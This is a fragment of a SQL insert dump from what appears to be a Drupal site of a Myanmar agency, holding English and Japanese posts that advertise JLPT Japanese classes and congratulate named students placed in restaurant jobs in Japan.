('announcement', 0, 62, 408, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：月曜日、火曜日、水曜日（3ヶ月）</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：月曜日、火曜日、水曜日（3ヶ月）</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_0.jpg\" data-align=\"center\" data-entity-uuid=\"462590b5-5d2f-431d-b50a-3efee62ade42\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2.jpg\" data-align=\"center\" data-entity-uuid=\"935c09db-5837-4a1f-8ef6-e63f9ec2e423\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 409, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a640b77-1f27-4315-aabb-ed1b6fa23767\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2_0.jpg\" data-align=\"center\" data-entity-uuid=\"0e09f7e4-6346-480c-afcf-bd6e1e27ada1\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 62, 409, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：月曜日、火曜日、水曜日（3ヶ月）</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解 、日本語能力試験 JLPT Old Questions！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：月曜日、火曜日、水曜日（3ヶ月）</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_0.jpg\" data-align=\"center\" data-entity-uuid=\"462590b5-5d2f-431d-b50a-3efee62ade42\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2.jpg\" data-align=\"center\" data-entity-uuid=\"935c09db-5837-4a1f-8ef6-e63f9ec2e423\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 66, 418, 'en', 0, '<p><strong>&nbsp;Exciting News for Japanese Language Enthusiasts!&nbsp;</strong></p><p>Dear language learners and enthusiasts,</p><p>For those eager to embark on a journey to learn Japanese from the very basics, we are thrilled to announce the launch of our outdoor courses starting this January!&nbsp;</p><p>&nbsp;<strong>Course Highlights:</strong></p><ul><li>Perfect for individuals desiring a systematic approach to learning Japanese.</li><li>In partnership with a licensed agency, ensuring a reliable and authentic learning experience.</li><li>Abundant job opportunities await those who seize this chance. Don\'t miss out on the possibilities!&nbsp;</li></ul><p>&nbsp;<strong>Pricing:</strong></p><ul><li>Basic + N5 Class: 180,000</li><li>N4 + Exam Practice Class: 200,000</li><li>Basic N5 + N4 Combo: Special price of 350,000 when enrolled together</li></ul><p><strong>Course Details:</strong></p><ol><li><strong>Basic + N5 Class</strong><ul><li>Duration: 3 months</li><li>Includes textbook and dress</li></ul></li><li><strong>N4 Class</strong><ul><li>Duration: 3 months</li><li>Includes textbook and dress</li></ul></li></ol><p><strong>Why Choose New Comet?</strong></p><ul><li>Comprehensive learning from N5 level and beyond.</li><li>Future courses, including Tokutei and small restaurant classes, are in the pipeline—stay tuned for more exciting opportunities!</li></ul><p><strong>Enroll Now and Secure Your Spot!</strong></p><p>Whether you are a beginner or looking to enhance your Japanese language skills, New Comet is the place to be. Join us for a vibrant learning experience that goes beyond the classroom!</p><p>For further details and enrollment, please visit our website or contact us directly. Let\'s embark on this language-learning adventure together!</p><img src=\"/sites/default/files/inline-images/asdf_0.jpg\" data-entity-uuid=\"b5b24a40-ac5a-4524-8f41-dbc338cf31b9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/gfjk.jpg\" data-entity-uuid=\"7cf51b8b-8e2d-477a-96d0-38ce8934a486\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 66, 420, 'en', 0, '<p><strong>&nbsp;Exciting News for Japanese Language Enthusiasts!&nbsp;</strong></p><p>Dear language learners and enthusiasts,</p><p>For those eager to embark on a journey to learn Japanese from the very basics, we are thrilled to announce the launch of our outdoor courses starting this January!&nbsp;</p><p>&nbsp;<strong>Course Highlights:</strong></p><ul><li>Perfect for individuals desiring a systematic approach to learning Japanese.</li><li>In partnership with a licensed agency, ensuring a reliable and authentic learning experience.</li><li>Abundant job opportunities await those who seize this chance. Don\'t miss out on the possibilities!&nbsp;</li></ul><p>&nbsp;<strong>Pricing:</strong></p><ul><li>Basic + N5 Class: 180,000</li><li>N4 + Exam Practice Class: 200,000</li><li>Basic N5 + N4 Combo: Special price of 350,000 when enrolled together</li></ul><p><strong>Course Details:</strong></p><ol><li><strong>Basic + N5 Class</strong><ul><li>Duration: 3 months</li><li>Includes textbook and dress</li></ul></li><li><strong>N4 Class</strong><ul><li>Duration: 3 months</li><li>Includes textbook and dress</li></ul></li></ol><p><strong>Why Choose New Comet?</strong></p><ul><li>Comprehensive learning from N5 level and beyond.</li><li>Future courses, including Tokutei and small restaurant classes, are in the pipeline—stay tuned for more exciting opportunities!</li></ul><p><strong>Enroll Now and Secure Your Spot!</strong></p><p>Whether you are a beginner or looking to enhance your Japanese language skills, New Comet is the place to be. Join us for a vibrant learning experience that goes beyond the classroom!</p><p>For further details and enrollment, please visit our website or contact us directly. Let\'s embark on this language-learning adventure together!</p><img src=\"/sites/default/files/inline-images/asdf_0.jpg\" data-entity-uuid=\"b5b24a40-ac5a-4524-8f41-dbc338cf31b9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/gfjk.jpg\" data-entity-uuid=\"7cf51b8b-8e2d-477a-96d0-38ce8934a486\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 67, 419, 'ja', 0, '<div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start gap-3 whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 overflow-x-auto\" data-message-author-role=\"assistant\" data-message-id=\"35b89d3e-0921-436b-ab27-82bc2cb137b8\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p><strong>Wishing Everyone a Happy New Day!&nbsp;</strong></p><p>At New Comet Agency, we\'re committed to providing practical Japanese language instruction to ensure that children who have successfully passed restaurant interviews in Japan don\'t have to pretend they don\'t know Japanese.</p><p>Our experienced teachers have been conducting group work and role-playing sessions in the kitchen, guiding the children through hands-on learning experiences.</p><p>It brings us immense joy to witness the dedication and hard work of the children as they immerse themselves in learning.&nbsp;</p></div></div></div><p><img src=\"/sites/default/files/inline-images/kitchen1.jpg\" data-entity-uuid=\"e4eddb02-06a2-4b5c-bd14-02b604e3dc82\" data-entity-type=\"file\"></p><img data-entity-uuid=\"d47065e6-2df0-45bc-815c-8368a7a89e79\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k2.jpg\"><img data-entity-uuid=\"9b97ccad-342f-4253-addb-1c82dddd9b59\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k3.jpg\"><img data-entity-uuid=\"733c4be4-b6a8-4440-9dd7-1811bdefb3e8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k4.jpg\"><img data-entity-uuid=\"71edfa87-7ce7-4924-890a-7bf612752fe6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k5.jpg\"><img data-entity-uuid=\"05645857-d0bf-4dfb-9b4d-77b25ba91e4a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k6.jpg\"><img data-entity-uuid=\"b8ffb27c-c647-4887-9807-054540a83372\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k7.jpg\"><img data-entity-uuid=\"9f9ea7b6-f9a0-4cc0-92da-c52350fa6a25\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k8.jpg\"><img data-entity-uuid=\"930afec0-6eb6-41ab-b244-9ebb4f28e578\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k9.jpg\"><img data-entity-uuid=\"8f75ca05-f487-4b08-b809-7c6ce2597b71\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k10.jpg\"><img data-entity-uuid=\"4c413184-0079-4ee4-8f6a-9cd8ea4f2ed1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/k11.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 67, 421, 'ja', 0, '<div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start gap-3 whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 overflow-x-auto\" data-message-author-role=\"assistant\" data-message-id=\"35b89d3e-0921-436b-ab27-82bc2cb137b8\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p><strong>Wishing Everyone a Happy New Day!&nbsp;</strong></p><p>At New Comet Agency, we\'re committed to providing practical Japanese language instruction to ensure that children who have successfully passed restaurant interviews in Japan don\'t have to pretend they don\'t know Japanese.</p><p>Our experienced teachers have been conducting group work and role-playing sessions in the kitchen, guiding the children through hands-on learning experiences.</p><p>It brings us immense joy to witness the dedication and hard work of the children as they immerse themselves in learning.&nbsp;</p></div></div></div><p><img src=\"/sites/default/files/inline-images/kitchen1.jpg\" data-entity-uuid=\"e4eddb02-06a2-4b5c-bd14-02b604e3dc82\" data-entity-type=\"file\"></p><img src=\"/sites/default/files/inline-images/k2.jpg\" data-entity-uuid=\"d47065e6-2df0-45bc-815c-8368a7a89e79\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k3.jpg\" data-entity-uuid=\"9b97ccad-342f-4253-addb-1c82dddd9b59\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k4.jpg\" data-entity-uuid=\"733c4be4-b6a8-4440-9dd7-1811bdefb3e8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k5.jpg\" data-entity-uuid=\"71edfa87-7ce7-4924-890a-7bf612752fe6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k6.jpg\" data-entity-uuid=\"05645857-d0bf-4dfb-9b4d-77b25ba91e4a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k7.jpg\" data-entity-uuid=\"b8ffb27c-c647-4887-9807-054540a83372\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k8.jpg\" data-entity-uuid=\"9f9ea7b6-f9a0-4cc0-92da-c52350fa6a25\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k9.jpg\" data-entity-uuid=\"930afec0-6eb6-41ab-b244-9ebb4f28e578\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k10.jpg\" data-entity-uuid=\"8f75ca05-f487-4b08-b809-7c6ce2597b71\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k11.jpg\" data-entity-uuid=\"4c413184-0079-4ee4-8f6a-9cd8ea4f2ed1\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 68, 422, 'en', 0, '<blockquote><h2><strong>Congratulations !</strong></h2></blockquote><p><strong>Congratulations HNIN WAI WAI NWE &amp; THIDA KHINE &nbsp;for departing to JAPAN , HOKKAIDO City with Food Service (Restaurant) Job at (22/4/2024).&nbsp;</strong></p><p><img src=\"/sites/default/files/inline-images/11.jpg\" data-entity-uuid=\"2f03d202-de51-47b7-ae4b-7e1c716e4ae8\" data-entity-type=\"file\"></p><img data-entity-uuid=\"177c6990-58c0-479a-9165-fe7d3c7bf2e5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22.jpg\"><img data-entity-uuid=\"410bcaaa-19e7-485e-b1fc-5ded63a9d07b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33.jpg\">', '', 'full_html'),
('activities', 0, 68, 423, 'en', 0, '<blockquote><h2><strong>Congratulations !</strong></h2></blockquote><p><strong>Congratulations HNIN WAI WAI NWE &amp; THIDA KHINE &nbsp;for departing to JAPAN , HOKKAIDO City with Food Service (Restaurant) Job at (22/4/2024).&nbsp;</strong></p><p><img src=\"/sites/default/files/inline-images/11.jpg\" data-entity-uuid=\"2f03d202-de51-47b7-ae4b-7e1c716e4ae8\" data-entity-type=\"file\"></p><img data-entity-uuid=\"177c6990-58c0-479a-9165-fe7d3c7bf2e5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22.jpg\"><img data-entity-uuid=\"410bcaaa-19e7-485e-b1fc-5ded63a9d07b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33.jpg\">', '', 'full_html'),
('activities', 0, 68, 423, 'ja', 0, '<blockquote><h2><strong>おめでとうございます!</strong></h2></blockquote><p><strong>HNIN WAI WAI NWE と THIDA KHINE が、2024 年 4 月 22 日に食品サービス (レストラン) の仕事に就いて日本、北海道へ出発することになりました。おめでとうございます。</strong></p><p><img src=\"/sites/default/files/inline-images/11.jpg\" data-entity-uuid=\"2f03d202-de51-47b7-ae4b-7e1c716e4ae8\" data-entity-type=\"file\"></p><img src=\"/sites/default/files/inline-images/22.jpg\" data-entity-uuid=\"177c6990-58c0-479a-9165-fe7d3c7bf2e5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33.jpg\" data-entity-uuid=\"410bcaaa-19e7-485e-b1fc-5ded63a9d07b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 68, 424, 'en', 0, '<blockquote><h2><strong>Congratulations !</strong></h2></blockquote><p><strong>Congratulations HNIN WAI WAI NWE &amp; THIDA KHINE &nbsp;for departing to JAPAN , HOKKAIDO City with Food Service (Restaurant) Job at (22/4/2024).&nbsp;</strong></p><p><img src=\"/sites/default/files/inline-images/11.jpg\" data-entity-uuid=\"2f03d202-de51-47b7-ae4b-7e1c716e4ae8\" data-entity-type=\"file\"></p><img src=\"/sites/default/files/inline-images/22.jpg\" data-entity-uuid=\"177c6990-58c0-479a-9165-fe7d3c7bf2e5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33.jpg\" data-entity-uuid=\"410bcaaa-19e7-485e-b1fc-5ded63a9d07b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 68, 424, 'ja', 0, '<blockquote><h2><strong>おめでとうございます!</strong></h2></blockquote><p><strong>HNIN WAI WAI NWE と THIDA KHINE が、2024 年 4 月 22 日に食品サービス (レストラン) の仕事に就いて日本、北海道へ出発することになりました。おめでとうございます。</strong></p><p><img src=\"/sites/default/files/inline-images/11.jpg\" data-entity-uuid=\"2f03d202-de51-47b7-ae4b-7e1c716e4ae8\" data-entity-type=\"file\"></p><img src=\"/sites/default/files/inline-images/22.jpg\" data-entity-uuid=\"177c6990-58c0-479a-9165-fe7d3c7bf2e5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33.jpg\" data-entity-uuid=\"410bcaaa-19e7-485e-b1fc-5ded63a9d07b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 69, 425, 'ja', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>2024年9月4日、NEW COMET Agency から日本の秋田への最初の<br>先祖を大切に仕事に取り組む8人の姉妹を誇りに思います、おめでとうございます。</p><p>すべてがうまくいきますように<br>日本でも頑張ってください。<br>私たちを信頼して協力してくれた姉妹たちに感謝します 。<br>さらなる仕事の依頼とともにあなたを日本に送りますので、私を信じてNEW COMET Agencyで働いてください。</p><img data-entity-uuid=\"02bd8861-4f61-4ce8-8859-0ee9ba68de94\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_1.jpg\"><img data-entity-uuid=\"75ed6f67-e3fe-490c-80d3-782cbbedcf72\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_1.jpg\"><img data-entity-uuid=\"82869cd0-2f21-4d96-b346-6e7f6d1544a6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_1.jpg\"><img data-entity-uuid=\"a504beda-28d7-4fdb-acd9-364f125b7ebf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_0.jpg\"><img data-entity-uuid=\"5c819877-3f4f-486f-9b3c-ec107c7b9f65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/55_0.jpg\"><img data-entity-uuid=\"bf63784b-8078-4f41-982c-98ed8a088b63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/66_0.jpg\"><img data-entity-uuid=\"9b1cc0fa-44d1-4d10-8a35-b2d8d5eb6a12\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/77_0.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 69, 426, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>September 4, 2024, the first from NEW COMET Agency to Akita, Japan</p><p>I am proud of the eight person who cherish their ancestors and work hard, congratulations.</p><p>May everything go well.</p><p>Good luck in Japan.</p><p>Thank you all to those who trusted us and cooperated with us.</p><p>I will send you to Japan with more work requests, so please trust me and work for NEW COMET Agency.</p><img src=\"/sites/default/files/inline-images/11_1.jpg\" data-entity-uuid=\"02bd8861-4f61-4ce8-8859-0ee9ba68de94\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/22_1.jpg\" data-entity-uuid=\"75ed6f67-e3fe-490c-80d3-782cbbedcf72\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33_1.jpg\" data-entity-uuid=\"82869cd0-2f21-4d96-b346-6e7f6d1544a6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_0.jpg\" data-entity-uuid=\"a504beda-28d7-4fdb-acd9-364f125b7ebf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/55_0.jpg\" data-entity-uuid=\"5c819877-3f4f-486f-9b3c-ec107c7b9f65\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/66_0.jpg\" data-entity-uuid=\"bf63784b-8078-4f41-982c-98ed8a088b63\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/77_0.jpg\" data-entity-uuid=\"9b1cc0fa-44d1-4d10-8a35-b2d8d5eb6a12\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 69, 426, 'ja', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>2024年9月4日、NEW COMET Agency から日本の秋田への最初の<br>先祖を大切に仕事に取り組む8人の姉妹を誇りに思います、おめでとうございます。</p><p>すべてがうまくいきますように<br>日本でも頑張ってください。<br>私たちを信頼して協力してくれた姉妹たちに感謝します 。<br>さらなる仕事の依頼とともにあなたを日本に送りますので、私を信じてNEW COMET Agencyで働いてください。</p><img data-entity-uuid=\"02bd8861-4f61-4ce8-8859-0ee9ba68de94\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_1.jpg\"><img data-entity-uuid=\"75ed6f67-e3fe-490c-80d3-782cbbedcf72\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_1.jpg\"><img data-entity-uuid=\"82869cd0-2f21-4d96-b346-6e7f6d1544a6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_1.jpg\"><img data-entity-uuid=\"a504beda-28d7-4fdb-acd9-364f125b7ebf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_0.jpg\"><img data-entity-uuid=\"5c819877-3f4f-486f-9b3c-ec107c7b9f65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/55_0.jpg\"><img data-entity-uuid=\"bf63784b-8078-4f41-982c-98ed8a088b63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/66_0.jpg\"><img data-entity-uuid=\"9b1cc0fa-44d1-4d10-8a35-b2d8d5eb6a12\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/77_0.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 70, 427, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to TIN ZAR WIN MYINT for passing the Interview for Tokutei Gaishoku (Restaurant) !</p><img src=\"/sites/default/files/inline-images/tin%20zar%20win%20myint.jpg\" data-entity-uuid=\"d814db09-311c-4d54-a43b-9e944510fa92\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 70, 430, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to TIN ZAR WIN MYINT for passing the Interview for Tokutei Gaishoku (Restaurant) !</p><img src=\"/sites/default/files/inline-images/tin%20zar%20win%20myint.jpg\" data-entity-uuid=\"d814db09-311c-4d54-a43b-9e944510fa92\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 70, 430, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したTIN ZAR WIN MYINTさん、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/tin%20zar%20win%20myint.jpg\" data-entity-uuid=\"d814db09-311c-4d54-a43b-9e944510fa92\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 71, 428, 'en', 0, '<blockquote><p>Congratulations!!</p></blockquote><p>Congratulations to EI EI WAI for passing the interview for Tokutei Gaishoku (Restaurant)</p><img src=\"/sites/default/files/inline-images/EI%20EI%20WEI.jpg\" data-entity-uuid=\"7220ef82-d2b1-4c93-80a5-cc42e6a69132\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 71, 429, 'en', 0, '<blockquote><p>Congratulations!!</p></blockquote><p>Congratulations to EI EI WAI for passing the interview for Tokutei Gaishoku (Restaurant)</p><img src=\"/sites/default/files/inline-images/EI%20EI%20WEI.jpg\" data-entity-uuid=\"7220ef82-d2b1-4c93-80a5-cc42e6a69132\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 71, 431, 'en', 0, '<blockquote><p>Congratulations!!</p></blockquote><p>Congratulations to EI EI WAI for passing the interview for Tokutei Gaishoku (Restaurant)</p><img src=\"/sites/default/files/inline-images/EI%20EI%20WEI.jpg\" data-entity-uuid=\"7220ef82-d2b1-4c93-80a5-cc42e6a69132\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 71, 431, 'ja', 0, '<blockquote><p>おめでとうございます！</p></blockquote><p>特定外食（レストラン）の面接に合格したEI EI WAEI EI WAIさん、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/EI%20EI%20WEI.jpg\" data-entity-uuid=\"7220ef82-d2b1-4c93-80a5-cc42e6a69132\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 72, 432, 'en', 0, '<blockquote><p>Congratulations!!</p></blockquote><p>Congratulations to YAW CHANG for passing the interview for Tokutei Gaishoku (Restaurant)</p>', '', 'full_html'),
('activities', 0, 72, 433, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to YAW CHANG for passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 72, 434, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to YAW CHANG for passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 72, 435, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to YAW CHANG for passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 72, 435, 'ja', 0, '<blockquote><h2>おめでとうございます!!</h2></blockquote><p>特定外食（レストラン）の面接に合格したYAW CHANYAW CHANGさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 73, 436, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations for&nbsp;</p><ol><li>KHIN KHIN KYAW</li><li>THET MYAT MYAT KHAING</li><li>WIN PYAE SHAN</li><li>HNIN THAZIN AUNG</li><li>YU YA NWAY</li></ol><p>For Departing to JAPAN, TOKYO with Tokueti Gaishoku (Restaurant) Job!&nbsp;</p><p>Have A safe Flight !&nbsp;</p><img><img data-entity-uuid=\"251d0d0b-e02b-4f4e-b008-c88aa598687e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_2.jpg\"><img data-entity-uuid=\"15767dc3-645d-4974-a641-d572f32a108f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_1.jpg\"><img data-entity-uuid=\"8bbf0b1b-586f-4a0c-93ee-d30e55e4a5bb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/55_1.jpg\">', '', 'full_html'),
